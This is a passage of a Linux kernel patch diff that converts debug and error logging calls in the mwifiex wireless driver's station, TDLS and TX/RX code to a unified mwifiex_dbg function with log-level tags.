EVENT_WEP_ICV_ERR: - dev_dbg(adapter->dev, "event: WEP ICV error\n"); + mwifiex_dbg(adapter, EVENT, "event: WEP ICV error\n"); break; case EVENT_BW_CHANGE: - dev_dbg(adapter->dev, "event: BW Change\n"); + mwifiex_dbg(adapter, EVENT, "event: BW Change\n"); break; case EVENT_HOSTWAKE_STAIE: - dev_dbg(adapter->dev, "event: HOSTWAKE_STAIE %d\n", eventcause); + mwifiex_dbg(adapter, EVENT, + "event: HOSTWAKE_STAIE %d\n", eventcause); break; case EVENT_REMAIN_ON_CHAN_EXPIRED: - dev_dbg(adapter->dev, "event: Remain on channel expired\n"); + mwifiex_dbg(adapter, EVENT, + "event: Remain on channel expired\n"); cfg80211_remain_on_channel_expired(&priv->wdev, priv->roc_cfg.cookie, &priv->roc_cfg.chan, @@ -496,7 +502,7 @@ int mwifiex_process_sta_event(struct mwifiex_private *priv) break; case EVENT_CHANNEL_SWITCH_ANN: - dev_dbg(adapter->dev, "event: Channel Switch Announcement\n"); + mwifiex_dbg(adapter, EVENT, "event: Channel Switch Announcement\n"); priv->csa_expire_time = jiffies + msecs_to_jiffies(DFS_CHAN_MOVE_TIME); priv->csa_chan = priv->curr_bss_params.bss_descriptor.channel; @@ -511,23 +517,23 @@ int mwifiex_process_sta_event(struct mwifiex_private *priv) break; case EVENT_TX_STATUS_REPORT: - dev_dbg(adapter->dev, "event: TX_STATUS Report\n"); + mwifiex_dbg(adapter, EVENT, "event: TX_STATUS Report\n"); mwifiex_parse_tx_status_event(priv, adapter->event_body); break; case EVENT_CHANNEL_REPORT_RDY: - dev_dbg(adapter->dev, "event: Channel Report\n"); + mwifiex_dbg(adapter, EVENT, "event: Channel Report\n"); ret = mwifiex_11h_handle_chanrpt_ready(priv, adapter->event_skb); break; case EVENT_RADAR_DETECTED: - dev_dbg(adapter->dev, "event: Radar detected\n"); + mwifiex_dbg(adapter, EVENT, "event: Radar detected\n"); ret = mwifiex_11h_handle_radar_detected(priv, adapter->event_skb); break; default: - dev_dbg(adapter->dev, "event: unknown event id: %#x\n", - eventcause); + mwifiex_dbg(adapter, ERROR, "event: unknown event id: %#x\n", + eventcause); break; } diff --git a/drivers/net/wireless/mwifiex/sta_ioctl.c b/drivers/net/wireless/mwifiex/sta_ioctl.c index a0bc26c5eac0..d8b7d9c20450 100644 --- a/drivers/net/wireless/mwifiex/sta_ioctl.c +++ b/drivers/net/wireless/mwifiex/sta_ioctl.c @@ -66,7 +66,8 @@ int mwifiex_wait_queue_complete(struct mwifiex_adapter *adapter, if (status <= 0) { if (status == 0) status = -ETIMEDOUT; - dev_err(adapter->dev, "cmd_wait_q terminated: %d\n", status); + mwifiex_dbg(adapter, ERROR, + "cmd_wait_q terminated: %d\n", status); mwifiex_cancel_all_pending_cmd(adapter); return status; } @@ -93,7 +94,8 @@ int 
mwifiex_request_set_multicast_list(struct mwifiex_private *priv, old_pkt_filter = priv->curr_pkt_filter; if (mcast_list->mode == MWIFIEX_PROMISC_MODE) { - dev_dbg(priv->adapter->dev, "info: Enable Promiscuous mode\n"); + mwifiex_dbg(priv->adapter, INFO, + "info: Enable Promiscuous mode\n"); priv->curr_pkt_filter |= HostCmd_ACT_MAC_PROMISCUOUS_ENABLE; priv->curr_pkt_filter &= ~HostCmd_ACT_MAC_ALL_MULTICAST_ENABLE; @@ -101,16 +103,16 @@ int mwifiex_request_set_multicast_list(struct mwifiex_private *priv, /* Multicast */ priv->curr_pkt_filter &= ~HostCmd_ACT_MAC_PROMISCUOUS_ENABLE; if (mcast_list->mode == MWIFIEX_ALL_MULTI_MODE) { - dev_dbg(priv->adapter->dev, - "info: Enabling All Multicast!\n"); + mwifiex_dbg(priv->adapter, INFO, + "info: Enabling All Multicast!\n"); priv->curr_pkt_filter |= HostCmd_ACT_MAC_ALL_MULTICAST_ENABLE; } else { priv->curr_pkt_filter &= ~HostCmd_ACT_MAC_ALL_MULTICAST_ENABLE; - dev_dbg(priv->adapter->dev, - "info: Set multicast list=%d\n", - mcast_list->num_multicast_addr); + mwifiex_dbg(priv->adapter, INFO, + "info: Set multicast list=%d\n", + mcast_list->num_multicast_addr); /* Send multicast addresses to firmware */ ret = mwifiex_send_cmd(priv, HostCmd_CMD_MAC_MULTICAST_ADR, @@ -118,9 +120,9 @@ int mwifiex_request_set_multicast_list(struct mwifiex_private *priv, mcast_list, false); } } - dev_dbg(priv->adapter->dev, - "info: old_pkt_filter=%#x, curr_pkt_filter=%#x\n", - old_pkt_filter, priv->curr_pkt_filter); + mwifiex_dbg(priv->adapter, INFO, + "info: old_pkt_filter=%#x, curr_pkt_filter=%#x\n", + old_pkt_filter, priv->curr_pkt_filter); if (old_pkt_filter != priv->curr_pkt_filter) { ret = mwifiex_send_cmd(priv, HostCmd_CMD_MAC_CONTROL, HostCmd_ACT_GEN_SET, @@ -153,7 +155,8 @@ int mwifiex_fill_new_bss_desc(struct mwifiex_private *priv, rcu_read_unlock(); if (!beacon_ie) { - dev_err(priv->adapter->dev, " failed to alloc beacon_ie\n"); + mwifiex_dbg(priv->adapter, ERROR, + " failed to alloc beacon_ie\n"); return -ENOMEM; } @@ -167,7 +170,8 @@ int mwifiex_fill_new_bss_desc(struct mwifiex_private *priv, bss_desc->bss_band = bss_priv->band; bss_desc->fw_tsf = bss_priv->fw_tsf; if (bss_desc->cap_info_bitmap & WLAN_CAPABILITY_PRIVACY) { - dev_dbg(priv->adapter->dev, "info: InterpretIE: AP WEP enabled\n"); + mwifiex_dbg(priv->adapter, INFO, + "info: InterpretIE: AP WEP enabled\n"); bss_desc->privacy = MWIFIEX_802_11_PRIV_FILTER_8021X_WEP; } else { bss_desc->privacy = MWIFIEX_802_11_PRIV_FILTER_ACCEPT_ALL; @@ -221,8 +225,8 @@ static int mwifiex_process_country_ie(struct mwifiex_private *priv, if (!strncmp(priv->adapter->country_code, &country_ie[2], 2)) { rcu_read_unlock(); - wiphy_dbg(priv->wdev.wiphy, - "11D: skip setting domain info in FW\n"); + mwifiex_dbg(priv->adapter, INFO, + "11D: skip setting domain info in FW\n"); return 0; } memcpy(priv->adapter->country_code, &country_ie[2], 2); @@ -243,8 +247,8 @@ static int mwifiex_process_country_ie(struct mwifiex_private *priv, if (mwifiex_send_cmd(priv, HostCmd_CMD_802_11D_DOMAIN_INFO, HostCmd_ACT_GEN_SET, 0, NULL, false)) { - wiphy_err(priv->adapter->wiphy, - "11D: setting domain info in FW\n"); + mwifiex_dbg(priv->adapter, ERROR, + "11D: setting domain info in FW fail\n"); return -1; } @@ -306,14 +310,15 @@ int mwifiex_bss_start(struct mwifiex_private *priv, struct cfg80211_bss *bss, if (mwifiex_11h_get_csa_closed_channel(priv) == (u8)bss_desc->channel) { - dev_err(adapter->dev, - "Attempt to reconnect on csa closed chan(%d)\n", - bss_desc->channel); + mwifiex_dbg(adapter, ERROR, + "Attempt to reconnect on csa closed 
chan(%d)\n", + bss_desc->channel); goto done; } - dev_dbg(adapter->dev, "info: SSID found in scan list ... " - "associating...\n"); + mwifiex_dbg(adapter, INFO, + "info: SSID found in scan list ...\t" + "associating...\n"); mwifiex_stop_net_dev_queue(priv->netdev, adapter); if (netif_carrier_ok(priv->netdev)) @@ -355,15 +360,17 @@ int mwifiex_bss_start(struct mwifiex_private *priv, struct cfg80211_bss *bss, netif_carrier_off(priv->netdev); if (!ret) { - dev_dbg(adapter->dev, "info: network found in scan" - " list. Joining...\n"); + mwifiex_dbg(adapter, INFO, + "info: network found in scan\t" + " list. Joining...\n"); ret = mwifiex_adhoc_join(priv, bss_desc); if (bss) cfg80211_put_bss(priv->adapter->wiphy, bss); } else { - dev_dbg(adapter->dev, "info: Network not found in " - "the list, creating adhoc with ssid = %s\n", - req_ssid->ssid); + mwifiex_dbg(adapter, INFO, + "info: Network not found in\t" + "the list, creating adhoc with ssid = %s\n", + req_ssid->ssid); ret = mwifiex_adhoc_start(priv, req_ssid); } } @@ -398,8 +405,9 @@ int mwifiex_set_hs_params(struct mwifiex_private *priv, u16 action, switch (action) { case HostCmd_ACT_GEN_SET: if (adapter->pps_uapsd_mode) { - dev_dbg(adapter->dev, "info: Host Sleep IOCTL" - " is blocked in UAPSD/PPS mode\n"); + mwifiex_dbg(adapter, INFO, + "info: Host Sleep IOCTL\t" + "is blocked in UAPSD/PPS mode\n"); status = -1; break; } @@ -496,7 +504,8 @@ int mwifiex_enable_hs(struct mwifiex_adapter *adapter) } if (adapter->hs_activated) { - dev_dbg(adapter->dev, "cmd: HS Already activated\n"); + mwifiex_dbg(adapter, CMD, + "cmd: HS Already activated\n"); return true; } @@ -512,14 +521,16 @@ int mwifiex_enable_hs(struct mwifiex_adapter *adapter) MWIFIEX_BSS_ROLE_STA), HostCmd_ACT_GEN_SET, MWIFIEX_SYNC_CMD, &hscfg)) { - dev_err(adapter->dev, "IOCTL request HS enable failed\n"); + mwifiex_dbg(adapter, ERROR, + "IOCTL request HS enable failed\n"); return false; } if (wait_event_interruptible_timeout(adapter->hs_activate_wait_q, adapter->hs_activate_wait_q_woken, (10 * HZ)) <= 0) { - dev_err(adapter->dev, "hs_activate_wait_q terminated\n"); + mwifiex_dbg(adapter, ERROR, + "hs_activate_wait_q terminated\n"); return false; } @@ -639,10 +650,11 @@ int mwifiex_set_tx_power(struct mwifiex_private *priv, dbm = (u16) power_cfg->power_level; if ((dbm < priv->min_tx_power_level) || (dbm > priv->max_tx_power_level)) { - dev_err(priv->adapter->dev, "txpower value %d dBm" - " is out of range (%d dBm-%d dBm)\n", - dbm, priv->min_tx_power_level, - priv->max_tx_power_level); + mwifiex_dbg(priv->adapter, ERROR, + "txpower value %d dBm\t" + "is out of range (%d dBm-%d dBm)\n", + dbm, priv->min_tx_power_level, + priv->max_tx_power_level); return -1; } } @@ -741,14 +753,15 @@ static int mwifiex_set_wpa_ie_helper(struct mwifiex_private *priv, { if (ie_len) { if (ie_len > sizeof(priv->wpa_ie)) { - dev_err(priv->adapter->dev, - "failed to copy WPA IE, too big\n"); + mwifiex_dbg(priv->adapter, ERROR, + "failed to copy WPA IE, too big\n"); return -1; } memcpy(priv->wpa_ie, ie_data_ptr, ie_len); priv->wpa_ie_len = (u8) ie_len; - dev_dbg(priv->adapter->dev, "cmd: Set Wpa_ie_len=%d IE=%#x\n", - priv->wpa_ie_len, priv->wpa_ie[0]); + mwifiex_dbg(priv->adapter, CMD, + "cmd: Set Wpa_ie_len=%d IE=%#x\n", + priv->wpa_ie_len, priv->wpa_ie[0]); if (priv->wpa_ie[0] == WLAN_EID_VENDOR_SPECIFIC) { priv->sec_info.wpa_enabled = true; @@ -761,8 +774,9 @@ static int mwifiex_set_wpa_ie_helper(struct mwifiex_private *priv, } else { memset(priv->wpa_ie, 0, sizeof(priv->wpa_ie)); priv->wpa_ie_len = 0; - 
dev_dbg(priv->adapter->dev, "info: reset wpa_ie_len=%d IE=%#x\n", - priv->wpa_ie_len, priv->wpa_ie[0]); + mwifiex_dbg(priv->adapter, INFO, + "info: reset wpa_ie_len=%d IE=%#x\n", + priv->wpa_ie_len, priv->wpa_ie[0]); priv->sec_info.wpa_enabled = false; priv->sec_info.wpa2_enabled = false; } @@ -782,23 +796,24 @@ static int mwifiex_set_wapi_ie(struct mwifiex_private *priv, { if (ie_len) { if (ie_len > sizeof(priv->wapi_ie)) { - dev_dbg(priv->adapter->dev, - "info: failed to copy WAPI IE, too big\n"); + mwifiex_dbg(priv->adapter, ERROR, + "info: failed to copy WAPI IE, too big\n"); return -1; } memcpy(priv->wapi_ie, ie_data_ptr, ie_len); priv->wapi_ie_len = ie_len; - dev_dbg(priv->adapter->dev, "cmd: Set wapi_ie_len=%d IE=%#x\n", - priv->wapi_ie_len, priv->wapi_ie[0]); + mwifiex_dbg(priv->adapter, CMD, + "cmd: Set wapi_ie_len=%d IE=%#x\n", + priv->wapi_ie_len, priv->wapi_ie[0]); if (priv->wapi_ie[0] == WLAN_EID_BSS_AC_ACCESS_DELAY) priv->sec_info.wapi_enabled = true; } else { memset(priv->wapi_ie, 0, sizeof(priv->wapi_ie)); priv->wapi_ie_len = ie_len; - dev_dbg(priv->adapter->dev, - "info: Reset wapi_ie_len=%d IE=%#x\n", - priv->wapi_ie_len, priv->wapi_ie[0]); + mwifiex_dbg(priv->adapter, INFO, + "info: Reset wapi_ie_len=%d IE=%#x\n", + priv->wapi_ie_len, priv->wapi_ie[0]); priv->sec_info.wapi_enabled = false; } return 0; @@ -816,8 +831,8 @@ static int mwifiex_set_wps_ie(struct mwifiex_private *priv, { if (ie_len) { if (ie_len > MWIFIEX_MAX_VSIE_LEN) { - dev_dbg(priv->adapter->dev, - "info: failed to copy WPS IE, too big\n"); + mwifiex_dbg(priv->adapter, ERROR, + "info: failed to copy WPS IE, too big\n"); return -1; } @@ -827,13 +842,14 @@ static int mwifiex_set_wps_ie(struct mwifiex_private *priv, memcpy(priv->wps_ie, ie_data_ptr, ie_len); priv->wps_ie_len = ie_len; - dev_dbg(priv->adapter->dev, "cmd: Set wps_ie_len=%d IE=%#x\n", - priv->wps_ie_len, priv->wps_ie[0]); + mwifiex_dbg(priv->adapter, CMD, + "cmd: Set wps_ie_len=%d IE=%#x\n", + priv->wps_ie_len, priv->wps_ie[0]); } else { kfree(priv->wps_ie); priv->wps_ie_len = ie_len; - dev_dbg(priv->adapter->dev, - "info: Reset wps_ie_len=%d\n", priv->wps_ie_len); + mwifiex_dbg(priv->adapter, INFO, + "info: Reset wps_ie_len=%d\n", priv->wps_ie_len); } return 0; } @@ -877,8 +893,8 @@ static int mwifiex_sec_ioctl_set_wep_key(struct mwifiex_private *priv, /* Copy the required key as the current key */ wep_key = &priv->wep_key[index]; if (!wep_key->key_length) { - dev_err(adapter->dev, - "key not set, so cannot enable it\n"); + mwifiex_dbg(adapter, ERROR, + "key not set, so cannot enable it\n"); return -1; } @@ -955,7 +971,8 @@ static int mwifiex_sec_ioctl_set_wpa_key(struct mwifiex_private *priv, /* Current driver only supports key length of up to 32 bytes */ if (encrypt_key->key_len > WLAN_MAX_KEY_LEN) { - dev_err(priv->adapter->dev, "key length too long\n"); + mwifiex_dbg(priv->adapter, ERROR, + "key length too long\n"); return -1; } @@ -1042,7 +1059,7 @@ mwifiex_drv_get_driver_version(struct mwifiex_adapter *adapter, char *version, snprintf(version, max_len, driver_version, fw_ver); - dev_dbg(adapter->dev, "info: MWIFIEX VERSION: %s\n", version); + mwifiex_dbg(adapter, MSG, "info: MWIFIEX VERSION: %s\n", version); return 0; } @@ -1130,7 +1147,8 @@ mwifiex_remain_on_chan_cfg(struct mwifiex_private *priv, u16 action, } if (mwifiex_send_cmd(priv, HostCmd_CMD_REMAIN_ON_CHAN, action, 0, &roc_cfg, true)) { - dev_err(priv->adapter->dev, "failed to remain on channel\n"); + mwifiex_dbg(priv->adapter, ERROR, + "failed to remain on channel\n"); return -1; 
} @@ -1315,8 +1333,8 @@ mwifiex_set_gen_ie_helper(struct mwifiex_private *priv, u8 *ie_data_ptr, if ((pvendor_ie->element_id == WLAN_EID_VENDOR_SPECIFIC) && (!memcmp(pvendor_ie->oui, wps_oui, sizeof(wps_oui)))) { priv->wps.session_enable = true; - dev_dbg(priv->adapter->dev, - "info: WPS Session Enabled.\n"); + mwifiex_dbg(priv->adapter, INFO, + "info: WPS Session Enabled.\n"); ret = mwifiex_set_wps_ie(priv, ie_data_ptr, ie_len); } @@ -1363,7 +1381,8 @@ static int mwifiex_misc_ioctl_gen_ie(struct mwifiex_private *priv, memset(adapter->arp_filter, 0, sizeof(adapter->arp_filter)); if (gen_ie->len > ARP_FILTER_MAX_BUF_SIZE) { adapter->arp_filter_size = 0; - dev_err(adapter->dev, "invalid ARP filter size\n"); + mwifiex_dbg(adapter, ERROR, + "invalid ARP filter size\n"); return -1; } else { memcpy(adapter->arp_filter, gen_ie->ie_data, @@ -1372,7 +1391,7 @@ static int mwifiex_misc_ioctl_gen_ie(struct mwifiex_private *priv, } break; default: - dev_err(adapter->dev, "invalid IE type\n"); + mwifiex_dbg(adapter, ERROR, "invalid IE type\n"); return -1; } return 0; diff --git a/drivers/net/wireless/mwifiex/sta_rx.c b/drivers/net/wireless/mwifiex/sta_rx.c index b8729c9394e9..d4d4cb1ce95b 100644 --- a/drivers/net/wireless/mwifiex/sta_rx.c +++ b/drivers/net/wireless/mwifiex/sta_rx.c @@ -141,7 +141,7 @@ int mwifiex_process_rx_packet(struct mwifiex_private *priv, if (priv->hs2_enabled && mwifiex_discard_gratuitous_arp(priv, skb)) { - dev_dbg(priv->adapter->dev, "Bypassed Gratuitous ARP\n"); + mwifiex_dbg(priv->adapter, INFO, "Bypassed Gratuitous ARP\n"); dev_kfree_skb_any(skb); return 0; } @@ -166,7 +166,8 @@ int mwifiex_process_rx_packet(struct mwifiex_private *priv, ret = mwifiex_recv_packet(priv, skb); if (ret == -1) - dev_err(priv->adapter->dev, "recv packet failed\n"); + mwifiex_dbg(priv->adapter, ERROR, + "recv packet failed\n"); return ret; } @@ -203,9 +204,9 @@ int mwifiex_process_sta_rx_packet(struct mwifiex_private *priv, rx_pkt_hdr = (void *)local_rx_pd + rx_pkt_offset; if ((rx_pkt_offset + rx_pkt_length) > (u16) skb->len) { - dev_err(adapter->dev, - "wrong rx packet: len=%d, rx_pkt_offset=%d, rx_pkt_length=%d\n", - skb->len, rx_pkt_offset, rx_pkt_length); + mwifiex_dbg(adapter, ERROR, + "wrong rx packet: len=%d, rx_pkt_offset=%d, rx_pkt_length=%d\n", + skb->len, rx_pkt_offset, rx_pkt_length); priv->stats.rx_dropped++; dev_kfree_skb_any(skb); return ret; @@ -214,7 +215,7 @@ int mwifiex_process_sta_rx_packet(struct mwifiex_private *priv, if (rx_pkt_type == PKT_TYPE_MGMT) { ret = mwifiex_process_mgmt_packet(priv, skb); if (ret) - dev_err(adapter->dev, "Rx of mgmt packet failed"); + mwifiex_dbg(adapter, ERROR, "Rx of mgmt packet failed"); dev_kfree_skb_any(skb); return ret; } diff --git a/drivers/net/wireless/mwifiex/sta_tx.c b/drivers/net/wireless/mwifiex/sta_tx.c index 5ce2d9a4f919..355ac5904fac 100644 --- a/drivers/net/wireless/mwifiex/sta_tx.c +++ b/drivers/net/wireless/mwifiex/sta_tx.c @@ -53,7 +53,8 @@ void *mwifiex_process_sta_txpd(struct mwifiex_private *priv, INTF_HEADER_LEN; if (!skb->len) { - dev_err(adapter->dev, "Tx: bad packet length: %d\n", skb->len); + mwifiex_dbg(adapter, ERROR, + "Tx: bad packet length: %d\n", skb->len); tx_info->status_code = -1; return skb->data; } @@ -184,21 +185,24 @@ int mwifiex_send_null_packet(struct mwifiex_private *priv, u8 flags) switch (ret) { case -EBUSY: dev_kfree_skb_any(skb); - dev_err(adapter->dev, "%s: host_to_card failed: ret=%d\n", - __func__, ret); + mwifiex_dbg(adapter, ERROR, + "%s: host_to_card failed: ret=%d\n", + __func__, ret); 
adapter->dbg.num_tx_host_to_card_failure++; break; case -1: adapter->data_sent = false; dev_kfree_skb_any(skb); - dev_err(adapter->dev, "%s: host_to_card failed: ret=%d\n", - __func__, ret); + mwifiex_dbg(adapter, ERROR, + "%s: host_to_card failed: ret=%d\n", + __func__, ret); adapter->dbg.num_tx_host_to_card_failure++; break; case 0: dev_kfree_skb_any(skb); - dev_dbg(adapter->dev, "data: %s: host_to_card succeeded\n", - __func__); + mwifiex_dbg(adapter, DATA, + "data: %s: host_to_card succeeded\n", + __func__); adapter->tx_lock_flag = true; break; case -EINPROGRESS: diff --git a/drivers/net/wireless/mwifiex/tdls.c b/drivers/net/wireless/mwifiex/tdls.c index 275a476f0dc7..2faa1bc42abe 100644 --- a/drivers/net/wireless/mwifiex/tdls.c +++ b/drivers/net/wireless/mwifiex/tdls.c @@ -37,7 +37,7 @@ static void mwifiex_restore_tdls_packets(struct mwifiex_private *priv, u32 tid; u8 tid_down; - dev_dbg(priv->adapter->dev, "%s: %pM\n", __func__, mac); + mwifiex_dbg(priv->adapter, DATA, "%s: %pM\n", __func__, mac); spin_lock_irqsave(&priv->wmm.ra_list_spinlock, flags); skb_queue_walk_safe(&priv->tdls_txq, skb, tmp) { @@ -94,7 +94,7 @@ static void mwifiex_hold_tdls_packets(struct mwifiex_private *priv, unsigned long flags; int i; - dev_dbg(priv->adapter->dev, "%s: %pM\n", __func__, mac); + mwifiex_dbg(priv->adapter, DATA, "%s: %pM\n", __func__, mac); spin_lock_irqsave(&priv->wmm.ra_list_spinlock, flags); for (i = 0; i < MAX_NUM_TID; i++) { @@ -132,8 +132,8 @@ mwifiex_tdls_append_rates_ie(struct mwifiex_private *priv, supp_rates_size = min_t(u16, rates_size, MWIFIEX_TDLS_SUPPORTED_RATES); if (skb_tailroom(skb) < rates_size + 4) { - dev_err(priv->adapter->dev, - "Insuffient space while adding rates\n"); + mwifiex_dbg(priv->adapter, ERROR, + "Insuffient space while adding rates\n"); return -ENOMEM; } @@ -199,8 +199,8 @@ mwifiex_tdls_add_ht_oper(struct mwifiex_private *priv, const u8 *mac, sta_ptr = mwifiex_get_sta_entry(priv, mac); if (unlikely(!sta_ptr)) { - dev_warn(priv->adapter->dev, - "TDLS peer station not found in list\n"); + mwifiex_dbg(priv->adapter, ERROR, + "TDLS peer station not found in list\n"); return -1; } @@ -247,15 +247,16 @@ static int mwifiex_tdls_add_vht_oper(struct mwifiex_private *priv, sta_ptr = mwifiex_get_sta_entry(priv, mac); if (unlikely(!sta_ptr)) { - dev_warn(adapter->dev, "TDLS peer station not found in list\n"); + mwifiex_dbg(adapter, ERROR, + "TDLS peer station not found in list\n"); return -1; } if (!mwifiex_is_bss_in_11ac_mode(priv)) { if (sta_ptr->tdls_cap.extcap.ext_capab[7] & WLAN_EXT_CAPA8_TDLS_WIDE_BW_ENABLED) { - dev_dbg(adapter->dev, - "TDLS peer doesn't support wider bandwidth\n"); + mwifiex_dbg(adapter, WARN, + "TDLS peer doesn't support wider bandwidth\n"); return 0; } } else { @@ -554,7 +555,7 @@ static int mwifiex_prep_tdls_encap_data(struct mwifiex_private *priv, tf->u.discover_req.dialog_token = dialog_token; break; default: - dev_err(priv->adapter->dev, "Unknown TDLS frame type.\n"); + mwifiex_dbg(priv->adapter, ERROR, "Unknown TDLS frame type.\n"); return -EINVAL; } @@ -608,8 +609,8 @@ int mwifiex_send_tdls_data_frame(struct mwifiex_private *priv, const u8 *peer, skb = dev_alloc_skb(skb_len); if (!skb) { - dev_err(priv->adapter->dev, - "allocate skb failed for management frame\n"); + mwifiex_dbg(priv->adapter, ERROR, + "allocate skb failed for management frame\n"); return -ENOMEM; } skb_reserve(skb, MWIFIEX_MIN_DATA_HEADER_LEN); @@ -742,7 +743,7 @@ mwifiex_construct_tdls_action_frame(struct mwifiex_private *priv, mwifiex_tdls_add_qos_capab(skb); break; 
default: - dev_err(priv->adapter->dev, "Unknown TDLS action frame type\n"); + mwifiex_dbg(priv->adapter, ERROR, "Unknown TDLS action frame type\n"); return -EINVAL; } @@ -781,8 +782,8 @@ int mwifiex_send_tdls_action_frame(struct mwifiex_private *priv, const u8 *peer, skb = dev_alloc_skb(skb_len); if (!skb) { - dev_err(priv->adapter->dev, - "allocate skb failed for management frame\n"); + mwifiex_dbg(priv->adapter, ERROR, + "allocate skb failed for management frame\n"); return -ENOMEM; } @@ -848,8 +849,8 @@ void mwifiex_process_tdls_action_frame(struct mwifiex_private *priv, peer = buf + ETH_ALEN; action = *(buf + sizeof(struct ethhdr) + 2); - dev_dbg(priv->adapter->dev, - "rx:tdls action: peer=%pM, action=%d\n", peer, action); + mwifiex_dbg(priv->adapter, DATA, + "rx:tdls action: peer=%pM, action=%d\n", peer, action); switch (action) { case WLAN_TDLS_SETUP_REQUEST: @@ -880,7 +881,7 @@ void mwifiex_process_tdls_action_frame(struct mwifiex_private *priv, ie_len = len - sizeof(struct ethhdr) - TDLS_CONFIRM_FIX_LEN; break; default: - dev_dbg(priv->adapter->dev, "Unknown TDLS frame type.\n"); + mwifiex_dbg(priv->adapter, ERROR, "Unknown TDLS frame type.\n"); return; } @@ -967,8 +968,8 @@ mwifiex_tdls_process_config_link(struct mwifiex_private *priv, const u8 *peer) sta_ptr = mwifiex_get_sta_entry(priv, peer); if (!sta_ptr || sta_ptr->tdls_status == TDLS_SETUP_FAILURE) { - dev_err(priv->adapter->dev, - "link absent for peer %pM; cannot config\n", peer); + mwifiex_dbg(priv->adapter, ERROR, + "link absent for peer %pM; cannot config\n", peer); return -EINVAL; } @@ -988,8 +989,8 @@ mwifiex_tdls_process_create_link(struct mwifiex_private *priv, const u8 *peer) sta_ptr = mwifiex_get_sta_entry(priv, peer); if (sta_ptr && sta_ptr->tdls_status == TDLS_SETUP_INPROGRESS) { - dev_dbg(priv->adapter->dev, - "Setup already in progress for peer %pM\n", peer); + mwifiex_dbg(priv->adapter, WARN, + "Setup already in progress for peer %pM\n", peer); return 0; } @@ -1046,8 +1047,8 @@ mwifiex_tdls_process_enable_link(struct mwifiex_private *priv, const u8 *peer) sta_ptr = mwifiex_get_sta_entry(priv, peer); if (sta_ptr && (sta_ptr->tdls_status != TDLS_SETUP_FAILURE)) { - dev_dbg(priv->adapter->dev, - "tdls: enable link %pM success\n", peer); + mwifiex_dbg(priv->adapter, MSG, + "tdls: enable link %pM success\n", peer); sta_ptr->tdls_status = TDLS_SETUP_COMPLETE; @@ -1076,8 +1077,8 @@ mwifiex_tdls_process_enable_link(struct mwifiex_private *priv, const u8 *peer) mwifiex_auto_tdls_update_peer_status(priv, peer, TDLS_SETUP_COMPLETE); } else { - dev_dbg(priv->adapter->dev, - "tdls: enable link %pM failed\n", peer); + mwifiex_dbg(priv->adapter, ERROR, + "tdls: enable link %pM failed\n", peer); if (sta_ptr) { mwifiex_11n_cleanup_reorder_tbl(priv); spin_lock_irqsave(&priv->wmm.ra_list_spinlock, @@ -1180,9 +1181,9 @@ void mwifiex_disable_all_tdls_links(struct mwifiex_private *priv) tdls_oper.tdls_action = MWIFIEX_TDLS_DISABLE_LINK; if (mwifiex_send_cmd(priv, HostCmd_CMD_TDLS_OPER, HostCmd_ACT_GEN_SET, 0, &tdls_oper, false)) - dev_warn(priv->adapter->dev, - "Disable link failed for TDLS peer %pM", - sta_ptr->mac_addr); + mwifiex_dbg(priv->adapter, ERROR, + "Disable link failed for TDLS peer %pM", + sta_ptr->mac_addr); } mwifiex_del_all_sta_list(priv); @@ -1204,9 +1205,9 @@ int mwifiex_tdls_check_tx(struct mwifiex_private *priv, struct sk_buff *skb) (peer->failure_count < MWIFIEX_TDLS_MAX_FAIL_COUNT)) { peer->tdls_status = TDLS_SETUP_INPROGRESS; - dev_dbg(priv->adapter->dev, - "setup TDLS link, peer=%pM rssi=%d\n", - 
peer->mac_addr, peer->rssi); + mwifiex_dbg(priv->adapter, INFO, + "setup TDLS link, peer=%pM rssi=%d\n", + peer->mac_addr, peer->rssi); cfg80211_tdls_oper_request(priv->netdev, peer->mac_addr, @@ -1272,8 +1273,8 @@ void mwifiex_add_auto_tdls_peer(struct mwifiex_private *priv, const u8 *mac) tdls_peer->rssi_jiffies = jiffies; INIT_LIST_HEAD(&tdls_peer->list); list_add_tail(&tdls_peer->list, &priv->auto_tdls_list); - dev_dbg(priv->adapter->dev, "Add auto TDLS peer= %pM to list\n", - mac); + mwifiex_dbg(priv->adapter, INFO, + "Add auto TDLS peer= %pM to list\n", mac); } spin_unlock_irqrestore(&priv->auto_tdls_lock, flags); @@ -1341,8 +1342,8 @@ void mwifiex_check_auto_tdls(unsigned long context) return; if (!priv->auto_tdls_timer_active) { - dev_dbg(priv->adapter->dev, - "auto TDLS timer inactive; return"); + mwifiex_dbg(priv->adapter, INFO, + "auto TDLS timer inactive; return"); return; } @@ -1368,9 +1369,9 @@ void mwifiex_check_auto_tdls(unsigned long context) !tdls_peer->rssi) && tdls_peer->tdls_status == TDLS_SETUP_COMPLETE) { tdls_peer->tdls_status = TDLS_LINK_TEARDOWN; - dev_dbg(priv->adapter->dev, - "teardown TDLS link,peer=%pM rssi=%d\n", - tdls_peer->mac_addr, -tdls_peer->rssi); + mwifiex_dbg(priv->adapter, MSG, + "teardown TDLS link,peer=%pM rssi=%d\n", + tdls_peer->mac_addr, -tdls_peer->rssi); tdls_peer->do_discover = true; priv->check_tdls_tx = true; cfg80211_tdls_oper_request(priv->netdev, @@ -1384,9 +1385,10 @@ void mwifiex_check_auto_tdls(unsigned long context) MWIFIEX_TDLS_MAX_FAIL_COUNT) { priv->check_tdls_tx = true; tdls_peer->do_setup = true; - dev_dbg(priv->adapter->dev, - "check TDLS with peer=%pM rssi=%d\n", - tdls_peer->mac_addr, -tdls_peer->rssi); + mwifiex_dbg(priv->adapter, INFO, + "check TDLS with peer=%pM\t" + "rssi=%d\n", tdls_peer->mac_addr, + tdls_peer->rssi); } } spin_unlock_irqrestore(&priv->auto_tdls_lock, flags); diff --git a/drivers/net/wireless/mwifiex/txrx.c b/drivers/net/wireless/mwifiex/txrx.c index 73082b51f6e1..28dcc84a34d2 100644 --- a/drivers/net/wireless/mwifiex/txrx.c +++ b/drivers/net/wireless/mwifiex/txrx.c @@ -50,7 +50,8 @@ int mwifiex_handle_rx_packet(struct mwifiex_adapter *adapter, priv = mwifiex_get_priv(adapter, MWIFIEX_BSS_ROLE_ANY); if (!priv) { - dev_err(adapter->dev, "data: priv not found. Drop RX packet\n"); + mwifiex_dbg(adapter, ERROR, + "data: priv not found. Drop RX packet\n"); dev_kfree_skb_any(skb); return -1; } @@ -120,7 +121,7 @@ int mwifiex_process_tx(struct mwifiex_private *priv, struct sk_buff *skb, switch (ret) { case -ENOSR: - dev_dbg(adapter->dev, "data: -ENOSR is returned\n"); + mwifiex_dbg(adapter, ERROR, "data: -ENOSR is returned\n"); break; case -EBUSY: if 